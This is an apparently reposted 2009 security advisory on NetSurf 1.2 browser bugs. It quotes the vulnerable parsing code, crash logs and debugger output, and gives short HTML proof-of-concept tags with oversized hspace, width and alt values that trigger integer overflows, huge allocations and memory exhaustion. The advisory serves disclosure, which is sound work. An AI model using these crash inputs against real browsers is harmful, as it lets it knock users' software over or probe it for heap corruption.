首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetSurf Web Browser 1.2 Multiple Remote Vulnerabilities
来源:jbrownsec.blogspot.com 作者:Brown 发布时间:2009-01-15  
--------------------------------------------------------------------------------------------------------------------------------------------

[Jeremy Brown 01-14-2009]
0xjbrown41@gmail.com/jbrownsec.blogspot.com
netsurf_multiple_adv.txt
--------------------------------------------------------------------------------------------------------------------------------------------

NetSurf Web Browser 1.2
http://www.netsurf-browser.org
Debian, Ubuntu, etc packages, or source code available @ http://www.netsurf-browser.org/downloads/releases/netsurf-1.2-src.tar.gz

Several bugs, including integer overflows and memory leaks, have been found in the NetSurf web browser. At one point in the research,
I was able to overwrite the ESI register with my own data which could lead to heap based exploitation of at least [Problem #2] of the bugs.
I was able to pass large values to several html tag attributes and make the program do huge malloc()'s. Some of the code seems to check for
small numbers when parsing values then attempting to render content, but large numbers trigger integer overflows when allocating memory.

--------------------------------------------------------------------------------------------------------------------------------------------

{Problem #1]

render/box_construct.c [1110-1136]:

if ((strcmp((const char *) n->name, "img") == 0) ||
(strcmp((const char *) n->name, "image") == 0) ||
(strcmp((const char *) n->name, "applet") == 0)) {
if ((s = (char *) xmlGetProp(n,
(const xmlChar *) "hspace"))) {
/* percentage hspace not implemented */
if (!strrchr(s, '%')) {
int value = isdigit(s[0]) ? atoi(s): -1;
if (0 <= value && !author->margin[LEFT]) {
style->margin[LEFT].margin =
CSS_MARGIN_LENGTH;
style->margin[LEFT].value.length.value =
value;
style->margin[LEFT].value.length.unit =
CSS_UNIT_PX;
}
if (0 <= value && !author->margin[RIGHT]) {
style->margin[RIGHT].margin =
CSS_MARGIN_LENGTH;
style->margin[RIGHT].value.length.
value = value;
style->margin[RIGHT].value.length.unit =
CSS_UNIT_PX;
}
}
xmlFree(s);
}

(netsurf:31889): GdkPixbuf-CRITICAL **: gdk_pixbuf_scale: assertion `src != NULL' failed
(netsurf:31889): GLib-GObject-CRITICAL **: g_object_unref: assertion `G_IS_OBJECT (object)' failed
The program 'netsurf' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadAlloc (insufficient resources for operation)'.
  (Details: serial 1071 error_code 11 request_code 53 minor_code 0)
  (Note to programmers: normally, X errors are reported asynchronously;
   that is, you will receive the error a while after causing it.
   To debug your program, run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)

Program exited with code 01.

[ltrace log -- hspace = 30000, without --sync]

gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
                                                        = 0x8cbda01
cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)
                                                        = 0
cairo_rectangle(0xb6600948, 0, 0, 0, 0)
                                                        = 0
cairo_clip(0xb6600948, 0, 0, 0, 0)
                                                        = 0xb6600aec
gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
                                                        = 0x8cbda01
gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>
malloc(3073536192) /// HUGE MALLOC
                                                        = NULL
<... gdk_pixbuf_get_from_drawable resumed> )
                                                        = 0
gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>
free(0xb6600dc8)
                                                        = <void>
free(0xb6600de0)
                                                        = <void>

PoCs: <applet code='test.class' hspace='32767'>
      <img src='test.jpg' hspace='32767'>

--------------------------------------------------------------------------------------------------------------------------------------------

[Problem #2]

render/layout.c [526-539]:

/* add margins, border, padding to min, max widths */
calculate_mbp_width(block->style, LEFT, &extra_fixed, &extra_frac);
calculate_mbp_width(block->style, RIGHT, &extra_fixed, &extra_frac);
if (extra_fixed < 0)
extra_fixed = 0;
if (extra_frac < 0)
extra_frac = 0;
if (1.0 <= extra_frac)
extra_frac = 0.9;
block->min_width = (min + extra_fixed) / (1.0 - extra_frac);
block->max_width = (max + extra_fixed) / (1.0 - extra_frac);

assert(0 <= block->min_width && block->min_width <= block->max_width);
}

$ calc 32767*32767*2+131006
2147483584

$ cat ns.sh ns2.sh
echo "<iframe src='test.jpg' width='$1'>`perl -e 'print "A" x 99999999'`" > int.html
echo "<iframe src='test.jpg' width='$1'>" > int.html
$

(gdb) shell ./ns.sh 2147483584
(gdb) r file:///home/rush/Desktop/int.html

[width = 2247483583 (2147483584+99999999) & 99,999,999 A's appended to test html file]

Program received signal SIGABRT, Aborted.
[Switching to Thread 0xb6d78720 (LWP 28933)]
0xb804e430 in __kernel_vsyscall ()
(gdb) i r
eax            0x0 0
ecx            0x7105 28933
edx            0x6 6
ebx            0x7105 28933
esp            0xbfb4cfe4 0xbfb4cfe4
ebp            0xbfb4cffc 0xbfb4cffc
esi            0xb7532b97 -1219286121
edi            0xb754fff4 -1219166220
eip            0xb804e430 0xb804e430 <__kernel_vsyscall+16>
eflags         0x206 [ PF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51
(gdb) bt
#0  0xb804e430 in __kernel_vsyscall ()
#1  0xb7421880 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7423248 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb741a72e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
#4  0x080a7cdd in ?? ()
#5  0x080a75e2 in ?? ()
#6  0x080a747d in ?? ()
#7  0x080ab3f0 in layout_document ()
#8  0x0809f073 in html_reformat ()
#9  0x080a0d95 in html_convert ()
#10 0x0805980c in content_convert ()
#11 0x0805cc49 in ?? ()
#12 0x0805a6c1 in fetch_send_callback ()
#13 0x08060c23 in ?? ()
#14 0x0806110f in ?? ()
#15 0x0805afe9 in fetch_poll ()
#16 0x08088276 in gui_poll ()
#17 0x0807fe94 in main ()

PoCs: <iframe src='test.jpg' width='2147483584'>
      <hr width='2147483584'>

--------------------------------------------------------------------------------------------------------------------------------------------

[Problem #3]

Memory leak & huge system resource consumption.

render/box_construct.c [1494-1514]:

bool box_image(BOX_SPECIAL_PARAMS)
{
bool ok;
char *s, *url;
xmlChar *alt, *src;

if (box->style && box->style->display == CSS_DISPLAY_NONE)
return true;

/* handle alt text */
if ((alt = xmlGetProp(n, (const xmlChar *) "alt"))) {
s = squash_whitespace((const char *) alt);
xmlFree(alt);
if (!s)
return false;
box->text = talloc_strdup(content, s);
free(s);
if (!box->text)
return false;
box->length = strlen(box->text);
}

PoC: <img src='test.jpg' alt='"A" x ~2000'>

--------------------------------------------------------------------------------------------------------------------------------------------


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·The Cisco IOS HTTP server is v
·NetSurf version 1.2 hspace rem
·Joomla com_Eventing 1.6.x Blin
·NetSurf version 1.2 width remo
·Ciansoft PDFBuilderX 2.2 Activ
·NetSurf version 1.2 remote mem
·Blue Eye CMS <= 1.0.0 (clanek)
·Oracle TimesTen Remote Format
·Novell Netware 6.5 ICEbrowser
·Oracle Secure Backup 10g exec_
·Excel Viewer OCX versions 3.1
·phosheezy 2.0 Remote Command E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved